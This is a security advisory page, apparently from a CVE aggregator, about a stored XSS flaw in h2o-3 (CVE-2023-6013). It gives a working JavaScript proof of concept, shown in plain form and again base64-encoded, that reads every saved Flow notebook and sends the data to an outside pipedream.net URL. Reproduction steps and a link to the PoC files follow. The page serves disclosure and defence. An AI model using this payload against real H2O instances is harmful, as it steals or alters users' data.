Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-6013: Leaking/modulation Flows/Model data via stored xss in h2o-3

H2O is vulnerable to stored XSS vulnerability which can lead to a Local File Include attack.

CVE
Open in Source
#xss#vulnerability#google#nodejs#js#git#java#gradle

Description

In h2o-3, the data of all open Flows can be leaked or tampered with through Stored XSS vulnerability, and information can be modified or read in the model.

Proof of Concept

hijack = (data) => {
    window.open(`https://b89f8f617e7792dc04cbdf2efbd5e0c9.m.pipedream.net/?data=${data}`)
}
flows_data = '';
flows_name = [];
fetch('http://localhost:54321/3/NodePersistentStorage/notebook')
    .then((x) => x.text())
    .then((x) => flows_data = JSON.parse(x))
    .then(() => {
        for(i = 0; i < flows_data['entries'].length; i++){
            flows_name.push(flows_data['entries'][i]['name'])
        }
    })
    .then(() => {
        for(i = 0; i < flows_name.length; i++){
            fetch(`http://localhost:54321/3/NodePersistentStorage/notebook/${flows_name[i]}`)
                .then((x) => x.text())
                .then((x) => hijack(x))
        }
    })

// aGlqYWNrID0gKGRhdGEpID0+IHsKICAgIHdpbmRvdy5vcGVuKGBodHRwczovL2I4OWY4ZjYxN2U3NzkyZGMwNGNiZGYyZWZiZDVlMGM5Lm0ucGlwZWRyZWFtLm5ldC8/ZGF0YT0ke2RhdGF9YCkKfQpmbG93c19kYXRhID0gJyc7CmZsb3dzX25hbWUgPSBbXTsKZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6NTQzMjEvMy9Ob2RlUGVyc2lzdGVudFN0b3JhZ2Uvbm90ZWJvb2snKQogICAgLnRoZW4oKHgpID0+IHgudGV4dCgpKQogICAgLnRoZW4oKHgpID0+IGZsb3dzX2RhdGEgPSBKU09OLnBhcnNlKHgpKQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX2RhdGFbJ2VudHJpZXMnXS5sZW5ndGg7IGkrKyl7CiAgICAgICAgICAgIGZsb3dzX25hbWUucHVzaChmbG93c19kYXRhWydlbnRyaWVzJ11baV1bJ25hbWUnXSkKICAgICAgICB9CiAgICB9KQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX25hbWUubGVuZ3RoOyBpKyspewogICAgICAgICAgICBmZXRjaChgaHR0cDovL2xvY2FsaG9zdDo1NDMyMS8zL05vZGVQZXJzaXN0ZW50U3RvcmFnZS9ub3RlYm9vay8ke2Zsb3dzX25hbWVbaV19YCkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiB4LnRleHQoKSkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiBoaWphY2soeCkpCiAgICAgICAgfQogICAgfSk=

The payload leaking data from all Flows is as above. To use it without any error, you need to base64 encode it.

How to build

# Build H2O
git clone https://github.com/h2oai/h2o-3.git
cd h2o-3
./gradlew build -x test

You may encounter problems: e.g. npm missing. Install it:
brew install npm

# Start H2O
java -jar build/h2o.jar

# Point browser to http://localhost:54321

Step to Reproduce

  1. Go to http://localhost:54321/flow/index.html
  2. Open the same file : Sample Data.flow
  3. Open the poc file : leak_poc.flow
  4. Click the play button on flows of leak_poc

Poc File

https://drive.google.com/drive/folders/1yINoutLUbj2-kpJHsqiGPxz7jkpBI4MX?usp=sharing

All PoCs and videos can be found on Google Drive above.

Impact

All data in this service can be tampered with or leaked without user’s permission.

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE